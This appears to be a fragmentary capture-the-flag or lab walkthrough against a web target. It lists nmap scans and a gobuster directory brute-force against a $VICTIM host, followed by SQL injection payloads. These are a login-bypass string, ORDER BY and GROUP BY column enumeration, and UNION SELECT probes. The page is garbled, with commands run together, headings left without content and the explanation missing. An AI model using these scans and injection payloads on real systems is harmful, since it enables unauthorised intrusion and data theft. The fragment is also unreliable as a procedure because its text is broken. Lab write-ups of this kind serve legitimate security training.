Lesson Learned?
Initial Scan
nmap -A $VICTIM
Scan all ports
TCP/80 - HTTP



Option #1






Last updated
nmap -A $VICTIM









Last updated
nmap -sV -sT -O -p 1-65535 $VICTIMgobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txtUsername: 1' or '1'='1'-- -
Password: 1' or '1'='1'-- -1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1' ORDER BY 4--+
1' GROUP BY 1--+
1' GROUP BY 2--+
1' GROUP BY 3--+
1' GROUP BY 4--+
1' UNION SELECT null-- -
1' UNION SELECT null,null-- -
1' UNION SELECT null,null,null-- -Username: 1' UNION SELECT null-- -
Password: 1' GROUP BY 2--+